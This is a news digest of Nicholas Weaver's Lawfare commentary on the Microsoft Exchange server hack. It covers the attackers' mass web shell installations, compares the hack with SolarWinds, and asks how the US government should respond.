ARGUMENT: Hacking ExchangeThe Microsoft Exchange Hack and the Great Email Robbery
The world is probably days away from the “Great Email Robbery,” in which a large number of threat actors around the globe are going to pillage and ransom the email servers of tens of thousands of businesses and local governments, Nicholas Weaver writes. Or at least pillage those that the purported Chinese actors haven’t already pillaged.” And now the Biden administration has a real hard policy problem: What now? The SolarWinds hack may have been significant, but [the Exchange attack] will affect far more institutions,” Weaver writes. “The Exchange attack showed complete disregard for possible consequences on behalf of those responsible for the breach,” but “without consequences, such broad attacks will simply continue.”
The world is probably days away from the “Great Email Robbery,” in which a large number of threat actors around the globe are going to pillage and ransom the email servers of tens of thousands of businesses and local governments, Nicholas Weaver writes in Lawfare. Or at least pillage those that the purported Chinese actors haven’t already pillaged.
On Mar. 5, the investigative journalist Brian Krebs reported that an “unusually aggressive Chinese cyber espionage unit” had gained access to more than 30,000 U.S. organizations. The New York Times detailed on Mar. 6 that “The number of victims is estimated to be in the tens of thousands and could rise.” How did the attackers breach the companies? The Chinese actors developed a way to hack Microsoft Exchange and then attacked the organizations from there. And many of those attacked are still vulnerable to follow-on attacks not just by the Chinese but numerous criminals. The impact of the Exchange hack will certainly be greater than SolarWinds and researchers aren’t even close to the end of the story. But it’s a complicated story, with a lot to untangle.
Weaver summarizes the story, noting that the Chinese actors were not using a single vulnerability but actually a sequence of four “zero-day” exploits. Somehow, the threat actor either knew that the exploits would soon become worthless or simply guessed that they would. So, in late February, the attacker changed strategy. Instead of simply exploiting targeted Exchange servers, the attackers stepped up their pace considerably by targeting tens of thousands of servers to install the web shell, an exploit that allows attackers to have remote access to a system.
Weaver adds:
And now the Biden administration has a real hard policy problem: What now? The SolarWinds hack may have been significant, but this will affect far more institutions. The SolarWinds hackers stayed subtle. They targeted traditional intelligence targets and never transitioned to a “pillage everything” model, which made that attack more of a “Spies Gonna Spy” operation. The Exchange attack showed complete disregard for possible consequences on behalf of those responsible for the breach.
Without consequences, such broad attacks will simply continue. There are currently no reasons why an attacker who has access to a zero-day shouldn’t simply press a button and exploit every possible target at the moment when they know their exploit is about to lose value. I don’t know how to change this calculus, but the U.S. must do so somehow.
